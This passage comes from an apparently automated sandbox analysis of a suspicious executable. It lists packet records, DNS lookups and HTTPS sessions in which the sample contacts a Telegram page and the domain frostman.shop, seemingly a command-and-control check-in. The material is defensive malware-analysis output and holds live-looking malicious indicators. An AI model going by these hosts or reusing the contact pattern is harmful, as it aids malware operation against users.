                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:37.978738070 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:37.979538918 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.017503977 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.081389904 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.095597029 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.222476959 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.222508907 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.222518921 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.222529888 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.222675085 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.222722054 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.223150969 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.223241091 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.223241091 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.236577988 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.292692900 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.297435999 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.329989910 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.395740986 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.396786928 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.410407066 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.411524057 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.411720037 CET60412443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.537050962 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.550645113 CET44360412172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.570600033 CET60412443192.168.2.6172.64.41.3

                                                                                                                                                                                                                                                                                                ICMP Packets

                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.654719114 CET192.168.2.61.1.1.1c2ce(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.464772940 CET192.168.2.61.1.1.1c2b9(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:38.300889015 CET192.168.2.61.1.1.1c29a(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.028122902 CET192.168.2.61.1.1.10xb1c9Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.403800964 CET192.168.2.61.1.1.10x6a90Standard query (0)frostman.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.718301058 CET192.168.2.61.1.1.10x435Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.718509912 CET192.168.2.61.1.1.10x7b77Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.415843010 CET192.168.2.61.1.1.10xd1ebStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.416080952 CET192.168.2.61.1.1.10x702eStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.178144932 CET192.168.2.61.1.1.10xb13Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.185748100 CET192.168.2.61.1.1.10x88a8Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.161313057 CET192.168.2.61.1.1.10xb345Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.161458015 CET192.168.2.61.1.1.10x8effStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.383187056 CET192.168.2.61.1.1.10x14bStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.383476973 CET192.168.2.61.1.1.10xa4Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.946472883 CET192.168.2.61.1.1.10xef77Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.946595907 CET192.168.2.61.1.1.10xb2a7Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.947132111 CET192.168.2.61.1.1.10x6e20Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.947280884 CET192.168.2.61.1.1.10x4258Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.954454899 CET192.168.2.61.1.1.10x9f47Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:37.954641104 CET192.168.2.61.1.1.10x9f0fStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.770867109 CET192.168.2.61.1.1.10xfd41Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.771015882 CET192.168.2.61.1.1.10xa917Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.771898985 CET192.168.2.61.1.1.10xf7d6Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.772078991 CET192.168.2.61.1.1.10xcf69Standard query (0)assets.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:30:59.165431976 CET1.1.1.1192.168.2.60xb1c9No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:01.722737074 CET1.1.1.1192.168.2.60x6a90No error (0)frostman.shop116.203.12.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.855297089 CET1.1.1.1192.168.2.60x435No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:17.856456041 CET1.1.1.1192.168.2.60x7b77No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.553004026 CET1.1.1.1192.168.2.60xd1ebNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.553004026 CET1.1.1.1192.168.2.60xd1ebNo error (0)plus.l.google.com172.217.17.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:24.553313017 CET1.1.1.1192.168.2.60x702eNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.875829935 CET1.1.1.1192.168.2.60xc178No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.875829935 CET1.1.1.1192.168.2.60xc178No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:25.875829935 CET1.1.1.1192.168.2.60xc178No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.315383911 CET1.1.1.1192.168.2.60xb13No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.325973988 CET1.1.1.1192.168.2.60x88a8No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:33.654659033 CET1.1.1.1192.168.2.60x4bb9No error (0)svc.ha-teams.office.commira-tmc.tm-4.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.373831034 CET1.1.1.1192.168.2.60x514cNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.373831034 CET1.1.1.1192.168.2.60x514cNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:34.464674950 CET1.1.1.1192.168.2.60x7d16No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.298563004 CET1.1.1.1192.168.2.60x8effNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.406510115 CET1.1.1.1192.168.2.60xb345No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.519865036 CET1.1.1.1192.168.2.60x14bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.519865036 CET1.1.1.1192.168.2.60x14bNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:36.521692038 CET1.1.1.1192.168.2.60xa4No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.083949089 CET1.1.1.1192.168.2.60x6e20No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.083949089 CET1.1.1.1192.168.2.60x6e20No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.084093094 CET1.1.1.1192.168.2.60xef77No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.084093094 CET1.1.1.1192.168.2.60xef77No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.084239006 CET1.1.1.1192.168.2.60x4258No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.084861994 CET1.1.1.1192.168.2.60xb2a7No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.091490984 CET1.1.1.1192.168.2.60x9f47No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.091490984 CET1.1.1.1192.168.2.60x9f47No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:38.091521978 CET1.1.1.1192.168.2.60x9f0fNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.831746101 CET1.1.1.1192.168.2.60x691dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:39.831746101 CET1.1.1.1192.168.2.60x691dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.908430099 CET1.1.1.1192.168.2.60xfd41No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.908430099 CET1.1.1.1192.168.2.60xfd41No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.908430099 CET1.1.1.1192.168.2.60xfd41No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.908430099 CET1.1.1.1192.168.2.60xfd41No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.908721924 CET1.1.1.1192.168.2.60xcf69No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:40.909291983 CET1.1.1.1192.168.2.60xf7d6No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.877300978 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:35.877300978 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.878185987 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:36.878185987 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:37.889450073 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:37.889450073 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.900013924 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:39.900013924 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:43.905812979 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:32:43.905812979 CET1.1.1.1192.168.2.60xf052No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                • t.me
                                                                                                                                                                                                                                                                                                • frostman.shop
                                                                                                                                                                                                                                                                                                • tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                • www.google.com
                                                                                                                                                                                                                                                                                                • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                • https:
                                                                                                                                                                                                                                                                                                  • assets.msn.com
                                                                                                                                                                                                                                                                                                  • c.msn.com
                                                                                                                                                                                                                                                                                                  • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  • browser.events.data.msn.com

                                                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                0192.168.2.64970720.198.118.190443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:30:55 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 4c 54 72 75 61 50 71 36 6b 79 6d 7a 53 34 77 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 39 31 34 38 62 62 36 62 31 64 65 30 61 38 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: sLTruaPq6kymzS4w.1Context: b9148bb6b1de0a8c
                                                                                                                                                                                                                                                                                                2024-12-20 06:30:55 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:30:55 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 73 4c 54 72 75 61 50 71 36 6b 79 6d 7a 53 34 77 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 39 31 34 38 62 62 36 62 31 64 65 30 61 38 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: sLTruaPq6kymzS4w.2Context: b9148bb6b1de0a8c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:30:55 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 73 4c 54 72 75 61 50 71 36 6b 79 6d 7a 53 34 77 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 39 31 34 38 62 62 36 62 31 64 65 30 61 38 63 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: sLTruaPq6kymzS4w.3Context: b9148bb6b1de0a8c
                                                                                                                                                                                                                                                                                                2024-12-20 06:30:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:30:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 54 62 65 55 59 6a 64 6d 6d 55 4b 2f 63 6b 5a 73 74 5a 52 58 50 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: TbeUYjdmmUK/ckZstZRXPQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                1192.168.2.649712149.154.167.994431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:00 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: t.me
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:01 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:01 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                Content-Length: 12304
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Set-Cookie: stel_ssid=1d53b76550f7305fa2_9748456401523359847; expires=Sat, 21 Dec 2024 06:31:01 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                                                                X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:01 UTC12304INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                2192.168.2.649715116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:03 UTC233OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:04 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                3192.168.2.64971420.198.119.143443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:04 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 67 6d 6f 54 58 41 4d 50 30 4b 77 77 6c 5a 69 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 61 61 31 32 31 66 35 34 63 39 61 32 38 38 39 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: bgmoTXAMP0KwwlZi.1Context: 9aa121f54c9a2889
